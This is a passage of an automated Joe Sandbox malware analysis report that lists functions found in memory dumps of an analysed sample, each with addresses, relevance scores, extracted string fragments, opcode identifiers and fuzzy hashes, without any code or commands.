                                                                                      Function 3550E67A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: ^P5
                                                                                      • API String ID: 3446177414-1230844626
                                                                                      • Opcode ID: 9201a4a9c48bf849fe918074e4d9c21d2bc698f7aac20efa88e407147f5b76a4
                                                                                      • Instruction ID: 4af1702949ae7bc901113868ca6e8036f6cc05fbad4a2b0f78c7fb567b54989a
                                                                                      • Opcode Fuzzy Hash: 9201a4a9c48bf849fe918074e4d9c21d2bc698f7aac20efa88e407147f5b76a4
                                                                                      • Instruction Fuzzy Hash: 334189B9A04241DFDB15CF29E4808657BF6FF89750B20846AEC09DB360DB71E881CFA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3550DF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: 0$0
                                                                                      • API String ID: 3446177414-203156872
                                                                                      • Opcode ID: d436318199ecb1131a250b0911423eaf31017ac7d881efd33f40b7d927958f68
                                                                                      • Instruction ID: 5a4d4a2e2d324e61a24346744fc6bb2aa9220b785ade4fcd54421f82ff03ea58
                                                                                      • Opcode Fuzzy Hash: d436318199ecb1131a250b0911423eaf31017ac7d881efd33f40b7d927958f68
                                                                                      • Instruction Fuzzy Hash: B1417BB56087059FD300CF28C844A4BBBE5BB88354F018A6EF488DB341D771EA05CF86
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3559D07E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: \Forwarders$\Forwarders\alt
                                                                                      • API String ID: 2994545307-1272641010
                                                                                      • Opcode ID: 27e45346d00ba3dd18943d25acc99f4c898f0f79770c7f1153597c69730f8123
                                                                                      • Instruction ID: 75dec662a29b494946ccbbdc893be520b26463151a8276f8de3f5752efc49184
                                                                                      • Opcode Fuzzy Hash: 27e45346d00ba3dd18943d25acc99f4c898f0f79770c7f1153597c69730f8123
                                                                                      • Instruction Fuzzy Hash: 03C08C98381E062EE02C622C4C24BF941AA5FC5200FD1C0927649CE1C0F80E3C824062
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Executed Functions

                                                                                      Function 04D43AE8 Relevance: .1, Instructions: 128COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c85795b6082bff3ee51ea3cbb5b1413807edbbabda1cdb0575d0c45be50f0059
                                                                                      • Instruction ID: b9e9cca59a08f5f8610b7b51a6b4446cf4584daf35a7a0ac40f02226c5365df5
                                                                                      • Opcode Fuzzy Hash: c85795b6082bff3ee51ea3cbb5b1413807edbbabda1cdb0575d0c45be50f0059
                                                                                      • Instruction Fuzzy Hash: F141F661B493E14FD30E836D48B9A75AFC19E9720174EC2EEDADA5F2E3C0848418D3A5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D43147 Relevance: 44.2, Strings: 35, Instructions: 432COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: !S$&$($)$)$+$0x$2Z$5$=$Aw$B!$DR$J$K$Q$S$S$V$V$Xd$Y$[$\j$a$a~$b$b$da$g$j$pB$s$1$K
                                                                                      • API String ID: 0-1180571323
                                                                                      • Opcode ID: cb66b2e082a800c7c74c453af89f5e5c5da82c96fa60e45ad13e662df942c883
                                                                                      • Instruction ID: c2f01e33ecae82fbd0d5ceb2dd9793380e00d1814b72b3097f61cf2bd73483a2
                                                                                      • Opcode Fuzzy Hash: cb66b2e082a800c7c74c453af89f5e5c5da82c96fa60e45ad13e662df942c883
                                                                                      • Instruction Fuzzy Hash: A842B0B0E05269CBEB64CF48C9987DDBBB1BB85308F1081D9C55D6B280D7B96AC8CF50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D50417 Relevance: 6.4, Strings: 5, Instructions: 147COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 6$O$S$\$s
                                                                                      • API String ID: 0-3854637164
                                                                                      • Opcode ID: af6f84b980c41e6521f3334fe038d502afeb10f75a0bd91f91afd1f71ac07a5d
                                                                                      • Instruction ID: 70966d247a669bbf8ce33e94fa7c530363c2c562a77a991dcfaebb9e71ddb5f3
                                                                                      • Opcode Fuzzy Hash: af6f84b980c41e6521f3334fe038d502afeb10f75a0bd91f91afd1f71ac07a5d
                                                                                      • Instruction Fuzzy Hash: 0741A6B2A00219BBDB10EBD4ED48EEBB3B8EF48318F004595ED0957150E675BA54CBE1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D5E0B7 Relevance: 2.6, Strings: 2, Instructions: 60COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ;T$U.!#
                                                                                      • API String ID: 0-1957567768
                                                                                      • Opcode ID: 69ca3cdb5c4473d228c8a7087f2f35a5683cb3ced3d452b291ac6f93aff323dc
                                                                                      • Instruction ID: 5bebb463da1df383d0081539a836d477ec9d9f27a778edbc11676684e9149b2d
                                                                                      • Opcode Fuzzy Hash: 69ca3cdb5c4473d228c8a7087f2f35a5683cb3ced3d452b291ac6f93aff323dc
                                                                                      • Instruction Fuzzy Hash: 8111F1B6D11218AF9B00DFA9DD409EFBBF8EF48305F0441AAE919E3200E7715A058FA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D59A22 Relevance: 1.5, Strings: 1, Instructions: 207COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: bTrB
                                                                                      • API String ID: 0-1577409840
                                                                                      • Opcode ID: 44416a8432de6e474aec5b11b022cfceea3b408eb5468c6438079f9494262c8b
                                                                                      • Instruction ID: b6ca50c3b2fa35febeb9e4c5e2ea9b75ed3d60d291bef909e54d4b28ab2c6e37
                                                                                      • Opcode Fuzzy Hash: 44416a8432de6e474aec5b11b022cfceea3b408eb5468c6438079f9494262c8b
                                                                                      • Instruction Fuzzy Hash: F151EABA14A695DBDF12CA78C8600D5BFA1FB5722072C11D9C9D15F623CB32A40BCBE1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D3B2F7 Relevance: .1, Instructions: 130COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fe4e0d75ec3a08d71d129fa9144989e1c29d3c709d059df4431d018cd1453b38
                                                                                      • Instruction ID: a4e336854621d64d7de5005654b7c58ceffb32246cc36e1ebb652bd7703ff8e8
                                                                                      • Opcode Fuzzy Hash: fe4e0d75ec3a08d71d129fa9144989e1c29d3c709d059df4431d018cd1453b38
                                                                                      • Instruction Fuzzy Hash: 9B41F0B1D11229AFDB14CF99C881AEEBBBCEF49710F10415AFA14E7241D7B1A640CBA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D3B28A Relevance: .1, Instructions: 113COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2343c1e8216c1cac2233553a791cd6bf3b743cec6b534dd77c5d48d244bca8b1
                                                                                      • Instruction ID: 0803f9d17b5ea46a20b57f0412e4e3de23339085e3f1284ff21364a45fc078f6
                                                                                      • Opcode Fuzzy Hash: 2343c1e8216c1cac2233553a791cd6bf3b743cec6b534dd77c5d48d244bca8b1
                                                                                      • Instruction Fuzzy Hash: EB318C719102149FCF24CF6DD88099EBBF4FF89725B204A2BE869E7222D771B541CB94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D5925A Relevance: .1, Instructions: 102COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2362f83d543e9cdd520cab1a8944f8f22dac1673631617e3e82e78eb5dbfd6ce
                                                                                      • Instruction ID: 21952f79476b00b2430145ac201df71bcf8e2b149ec33c0369d418f97b51bb36
                                                                                      • Opcode Fuzzy Hash: 2362f83d543e9cdd520cab1a8944f8f22dac1673631617e3e82e78eb5dbfd6ce
                                                                                      • Instruction Fuzzy Hash: 3D215E73A153549FDF12DF7C99C14A9BBA9DF4321871801EAD8849B163E622581287E2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D5FFA7 Relevance: .1, Instructions: 87COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1cc66638db275e139b995fcd7d8c2a149ab873b67b735d20c9860dda9d2102ca
                                                                                      • Instruction ID: 043e9e1c12eb4dbde5c6e2ed907291611647075cde6c94aef52ffa6c5330a35d
                                                                                      • Opcode Fuzzy Hash: 1cc66638db275e139b995fcd7d8c2a149ab873b67b735d20c9860dda9d2102ca
                                                                                      • Instruction Fuzzy Hash: 1E219DB2605549AFDB44DF99DC81EEB77ADEF8C718F118208FA1993240D634F851CBA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D600D7 Relevance: .1, Instructions: 79COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d54d75a9b9c82047ecdf3e7456f1034db528849b7b4a9d21db889e56315d68a6
                                                                                      • Instruction ID: 68abc08afe97c5ffe7f452918884d2d264241ee54722b3f4e124467e9e60c999
                                                                                      • Opcode Fuzzy Hash: d54d75a9b9c82047ecdf3e7456f1034db528849b7b4a9d21db889e56315d68a6
                                                                                      • Instruction Fuzzy Hash: 7221BFB2600549AFDB04DE98DC81EAB77EDEB8D718F118208FA1D97240D634B9118BA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D50257 Relevance: .1, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cdb1e94950de86578350782b09c7d3f723519b7f04c3368703bb0b26e491c259
                                                                                      • Instruction ID: bf84f12ef448302fd55c29999617c584b4e2b23adefdeafca3bf464770e8ba22
                                                                                      • Opcode Fuzzy Hash: cdb1e94950de86578350782b09c7d3f723519b7f04c3368703bb0b26e491c259
                                                                                      • Instruction Fuzzy Hash: F51170B23802057BF720AA559C42FAB375CDF85B68F244015FF08AF2C1DAB5B81186B8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D5FA27 Relevance: .1, Instructions: 71COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 60623fb1bfbef90ef70a9db84822afd8ff099caa8afd55f7c6d03ec31017c283
                                                                                      • Instruction ID: 0b1bdc5551c90e00881a2b46151f066f975b272e31a22de85b802cd968c78c4f
                                                                                      • Opcode Fuzzy Hash: 60623fb1bfbef90ef70a9db84822afd8ff099caa8afd55f7c6d03ec31017c283
                                                                                      • Instruction Fuzzy Hash: 1111D3B2200649ABDB14DF99DC81EAB73EDEF8D714F008608FA5997240DA34B811CBB5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D602A7 Relevance: .1, Instructions: 63COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: be8a68f361f1bb8937382598fb316db3509c07ae3cb1a488a5cf50d48949e60e
                                                                                      • Instruction ID: d90365c6b7b53897fec22e8823a2d3590f3667edf9fd929199525d62ef68d62e
                                                                                      • Opcode Fuzzy Hash: be8a68f361f1bb8937382598fb316db3509c07ae3cb1a488a5cf50d48949e60e
                                                                                      • Instruction Fuzzy Hash: C0113AB2600649AFD714DE99DC81EAB73ACEFC9714F008509FA1997240D630B811CBB5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D5CE87 Relevance: .1, Instructions: 62COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 116e9ac60c56180657f10aedb265f9b322b7ee6d2075b0631ee39c177a0317b2
                                                                                      • Instruction ID: fc9603653c0bbbaeac7a551126f59a3b5a2551708c674617009f7b6975cc6256
                                                                                      • Opcode Fuzzy Hash: 116e9ac60c56180657f10aedb265f9b322b7ee6d2075b0631ee39c177a0317b2
                                                                                      • Instruction Fuzzy Hash: 8711E2B6D1121CAF9B00DF99D9409EFB7F9EF48214F14456AE915E7200E7705A058BA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D5D327 Relevance: .1, Instructions: 62COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6dad35b4529c75a128a6aa50588656dd2c148ba6b63cf8461a65eda01320683b
                                                                                      • Instruction ID: e93ca1ea78635c87893bbad242d6211f5888c25f8e3e8c4910a9acc294934934
                                                                                      • Opcode Fuzzy Hash: 6dad35b4529c75a128a6aa50588656dd2c148ba6b63cf8461a65eda01320683b
                                                                                      • Instruction Fuzzy Hash: 7511EFB6E01219AF9B00EFA9D9409EFB7F9EF58310F14816AE915E3200E7705A048BA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D59787 Relevance: .1, Instructions: 59COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6e422a11d80964a66fe28403b70f8c6c0ca1ca30559565dd3407c8668639521f
                                                                                      • Instruction ID: b90d71768dbeddbdd9d5dc75a01fa4a9cfd697413e5c4d73d248e14eaadfc1b0
                                                                                      • Opcode Fuzzy Hash: 6e422a11d80964a66fe28403b70f8c6c0ca1ca30559565dd3407c8668639521f
                                                                                      • Instruction Fuzzy Hash: 1E019EB7B002186BEB11FAA4DC45DEB736CDF58214F000296FE199B241FA71BE518AF1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D5DA17 Relevance: .1, Instructions: 58COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 57c38652f04c3e6fc6d848d628b07fdb5183f2d93f4cdb1bf2c98d80a14e9074
                                                                                      • Instruction ID: b8f384d76728a7bd38a55d4677a6699c4c14afb196372fafdd980d6fc66476b6
                                                                                      • Opcode Fuzzy Hash: 57c38652f04c3e6fc6d848d628b07fdb5183f2d93f4cdb1bf2c98d80a14e9074
                                                                                      • Instruction Fuzzy Hash: C611EFB6D0121CAF9B40EFE9D8409EFBBF9EF58214F14416BE919E3600E7715A148BE1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D5F747 Relevance: .1, Instructions: 52COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 81e093a689c1c37b675b5fde88b3e17f9a8c582a285d6faeb489867b7e8bcf05
                                                                                      • Instruction ID: 4e2dab5ecd9bd16778af713e035c4a7aecba4c6e3c9f5a5ef6e01be161b2ca3a
                                                                                      • Opcode Fuzzy Hash: 81e093a689c1c37b675b5fde88b3e17f9a8c582a285d6faeb489867b7e8bcf05
                                                                                      • Instruction Fuzzy Hash: EB018FB2700644BFEA14EB68CC85EBB73ACEFC9719F00441AFA5987240DA717910CBB5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D5F867 Relevance: .1, Instructions: 51COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7a1076260d05281105e2151916be96bc6296b74fa0fd1283bc3a41e6f0a66288
                                                                                      • Instruction ID: a970c8373fd075973316f6421a22a384caae35ce28cdc7c13604db44af6e1502
                                                                                      • Opcode Fuzzy Hash: 7a1076260d05281105e2151916be96bc6296b74fa0fd1283bc3a41e6f0a66288
                                                                                      • Instruction Fuzzy Hash: DA01B8B2B00644BFE614ABA8CC85FAB77ACEFC5718F008409FA1997240DA307800CBB0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D605A7 Relevance: .0, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bd1830022928dfcb9d18b5ce06b65be62c0711ec9c27982340bae9e608337d9c
                                                                                      • Instruction ID: 97843fea09989fcffdc272fcb024d9401e71e62c413cce38978be107c9655792
                                                                                      • Opcode Fuzzy Hash: bd1830022928dfcb9d18b5ce06b65be62c0711ec9c27982340bae9e608337d9c
                                                                                      • Instruction Fuzzy Hash: 5D0180B2205108BBDB48DE99DC85EEB77ADEF8C714F508609BA49E7240D630F8518BA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D3B2E9 Relevance: .0, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 09c9d9fa4e0422ec2a30ad95cf11e6acc5b0071cad9b18ace929513c958cb7ec
                                                                                      • Instruction ID: 403d7cb214dc6a59b1c6df995326e1bfd194499f7a976b985eac947714f76a52
                                                                                      • Opcode Fuzzy Hash: 09c9d9fa4e0422ec2a30ad95cf11e6acc5b0071cad9b18ace929513c958cb7ec
                                                                                      • Instruction Fuzzy Hash: 321105B1D21228AF8F44CFADD9805DEBFF8FB09720B10865BE868E7211D77596418F94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D5CDF7 Relevance: .0, Instructions: 46COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7375021f1bc08ca1f26ce57d9fccb8d1876791fb91a093c2c4477ea6dd68e75e
                                                                                      • Instruction ID: 686c56340632e1e12838bd2111188a6a5514a2db95f9f0d8f68f38f1b5264259
                                                                                      • Opcode Fuzzy Hash: 7375021f1bc08ca1f26ce57d9fccb8d1876791fb91a093c2c4477ea6dd68e75e
                                                                                      • Instruction Fuzzy Hash: 7001DBB2D01219AF9B40DFE8D9409EEBBF8AE18204F14416EE919F2240E7715A048FA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D3B447 Relevance: .0, Instructions: 40COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
